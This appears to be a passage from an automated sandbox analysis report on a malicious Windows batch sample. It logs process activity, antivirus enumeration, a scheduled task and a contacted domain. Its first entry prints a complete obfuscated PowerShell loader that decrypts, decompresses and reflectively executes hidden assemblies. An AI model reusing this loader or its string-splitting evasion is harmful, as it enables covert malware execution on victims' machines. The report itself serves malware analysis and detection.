Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));	Jump to behavior

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

38_2_0000000140002300

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

38_2_0000000140002300

Source: dwm.exe, 0000002A.00000002.3081128578.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002A.00000000.2467392240.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\cmd.exe

Code function: 19_3_00000224138E2AF0 cpuid

19_3_00000224138E2AF0

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$rbx-QgS1M4PT VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$rbx-QgS1M4PT VolumeInformation

Source: C:\Windows\System32\dllhost.exe

Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

38_2_0000000140002300

Source: C:\Windows\System32\cmd.exe

Code function: 19_2_0000022413908090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

19_2_0000022413908090

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: dllhost.exe, Amcache.hve.10.dr, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.50.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.64.119.55	azure-winsecure.com	United States		22612	NAMECHEAP-NETUS	false

Contacted Domains

Name	IP	Active
azure-winsecure.com	192.64.119.55	true

AV Detection

Multi AV Scanner detection for submitted file

Source: 1.cmd

Virustotal: Detection: 14%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 35_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

35_2_00401000

Source:	Binary string: System.Configuration.Install.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdbMZ source: WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
